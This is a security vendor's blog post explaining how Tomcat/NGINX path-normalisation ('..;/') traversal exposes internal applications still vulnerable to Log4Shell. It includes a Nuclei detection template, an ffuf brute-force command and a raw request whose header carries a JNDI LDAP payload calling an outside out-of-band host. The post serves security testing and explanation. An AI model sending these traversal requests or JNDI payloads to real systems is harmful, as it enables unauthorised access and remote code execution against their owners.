Log4Shell Is Dead! Long Live Log4Shell!

Log4Shell Is Dead! Long Live Log4Shell!

As part of our Continuous Automated Red Teaming and Attack Surface Management technology - the watchTowr Platform - we're incredibly proud of our ability to discover nested, exploitable vulnerabilities across huge attack surfaces.

Sometimes, we see old vulnerabilities appear - accessible and exploitable only via unusual path ways, or by abusing unintended behaviour. In this blogpost, we'll be talking about our experience of building the watchTowr Platform to highlight these behaviours and chain exploitation  - using Log4Shell as an example that we commonly see.

To this day, the watchTowr Platform regularly and autonomously finds Log4Shell in trivially exploitable situations across wide attack surfaces - primarily due to it's ubiquitous nature.

But most interestingly, when chaining vulnerabilities together, we see Log4Shell appear in majestic, beautiful manners.

'Log4Shell' is a word that causes trauma, stress and a range of other feelings in security practitioners - even 18+ months after disclosure of the initial vulnerability.

As a brief refresher, Log4Shell set most of the Internet on fire in December 2021 - when a code execution vulnerability in one of the most prevalent and widely used Java logging packages (Log4J) was discovered. The security world sprung into action, identifying vulnerable systems, working out what was exploitable (with the help of technology like the watchTowr Platform), and remediating rapidly.

18+ months later, Log4Shell has persisted - in various forms. Given the prevalence of Log4J, in most enterprise environments, everything was vulnerable. Thus prioritisation was key to handling the massive remediation task - focused on hosts and systems that could be exploited via the Internet (regardless of whether first-order, second-order, third-order etc processing).

Log4Shell was dead! Well, not quite..

But let's start with.. "unusual behaviour".

Tomcat Path Normalisation

Path Normalisation is well-trodden ground, with some fantastic prior art:

But, as a simple summary:

When utilising NGINX functionality 'proxy_pass', NGINX (and other reverse proxies) possesses the capability to transmit all incoming requests targeted at a specific path (lets use '/publicfolder' in this example) to another server  - for the purpose of this example, let's say it's passed to 'http://internal/app1/'. For a brief explainer on 'proxy_pass', you can find it here.

If we "visualise" typical architecture, it might look like the following:

NGINX <> Tomcat <> Target Application

Now, a few things worth noting:

  • NGINX considers "..;" to be a folder name, so a URL like "http://publicserver/publicfolder/..;/ is likely to match a configured proxy_pass rule and forward the request to the Tomcat server.
  • The Tomcat server considers "..;" to indicate path traversal and will translate the original URI provided to /app1/../

In this scenario, where unusual behaviour has been identified, an attacker could use the following example URL to traverse out the intended path: http://targetserver/publicfolder/..;/manager/html, and the request will be forwarded to http://internal/app1/../manager/html which ultimately becomes http://internal/manager/html.

As shown above in the example, commonly and lacking inspiration, this is used and abused to access Tomcat management interfaces - i.e. the Tomcat Manager - which would otherwise not be exposed to the internet.

But - as I'm sure anyone reading this post has already determined - there is a lot more we can realistically do with this - including other applications/servlets on the server which typically may only be accessible to localhost, traversing to different controllers of the initial application, or even different applications.

In short, we're suddenly exposed to significantly more attack surface (more application code, servlets, etc), that is expected to not be exposed to the Internet.

Long Live Log4Shell!

So, how is this relevant to Log4Shell?

As briefly mentioned - if we can begin to traverse outside of the expected application, it's plausible that we may access systems, applications, servlets (and any variation in between) that were de-prioritised from patching and remediation of Log4Shell given an understandable belief that exploitation via the Internet should have in theory not been possible.

This means we can chain these two behaviours to still find vulnerable systems at scale, following the following process;

  1. Identify systems that show signs of path normalisation behaviour
  2. Identify exposed extra attack surface via the path normalisation behaviour
  3. Send benign Log4Shell payloads to enumerated extra attack surface.

Identify systems that show signs of path normalisation behaviour

We can use the following blunt-but-simple Nuclei template to identify systems that show unusual behaviour:

id: path-normalization-find-the-behaviour-wt
info:
  name: name
  author: watchTowr
  severity: info
  description: Identifying path normalization behaviour at scale
  tags: tomcat,path-normalization

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |+
        GET {{RootURL}}/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/ HTTP/1.1
        Host: {{Hostname}}

      - |+
        GET {{RootURL}}/..;/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
    - type: dsl
      dsl:
        - "status_code_1 != 400 && status_code_2 == 400 && status_code_3 != 400"

    extractors:
    - type: dsl 
      dsl:
        - status_code_1 
        - status_code_2 
        - status_code_3

The configured matchers pose the following questions regarding the responses:

  1. Does the root path trigger a 400 Bad Request error?
  2. Does an unusual number of ..;/ traversals lead to a 400 error?
  3. Does a single ..;/ traversal on the root, not result in a 400 error?

Should these behaviours be observed, its worth investigating further. While false positives (FPs) remain feasible with this blunt detection mechanism with certain proxies, the likelihood is high that the request is being processed at a different level, introducing a new attack surface - and thus for the purposes of automation, we can work off this.

Identify exposed extra attack surface via the path normalisation behaviour

This is now as simple as bruteforcing for content and applications, using the aforementioned path normalisation. An example command is below to demonstrate the simplicity;

$ ffuf -c -w worldist.txt -u "https://watchtowr.com/..;/FUZZ"

Send benign Log4Shell payloads to enumerated extra attack surface.

Assuming the step above provides us with enumerated attack surface, we can send benign Log4Shell payloads in various formats to this newly enumerated, attack surface.

Below is an example, illustrating the simplicitly of combining an identified path normalization issue, with a known existing vulnerability (Log4Shell).

GET /..;/exampleappname/ HTTP/1.1
Host: watchtowr.com
Accept: ${jndi:ldap://oob.watchtowr.com/watchtowr.class}

Conclusion

I hope you enjoyed this look at how we typically chain, at scale, strange behaviour with highly-exploitable weaknesses.

Whilst nothing described above is necessarily bleeding-edge, as a team we're suckers for ways in which we can use unintended behaviour to exploit real vulnerabilities - at scale. These concepts are extrapolated and loaded into the watchTowr Platform - allowing for the detection of unusual behaviour and further exploitation.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic exploitable vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please contact us.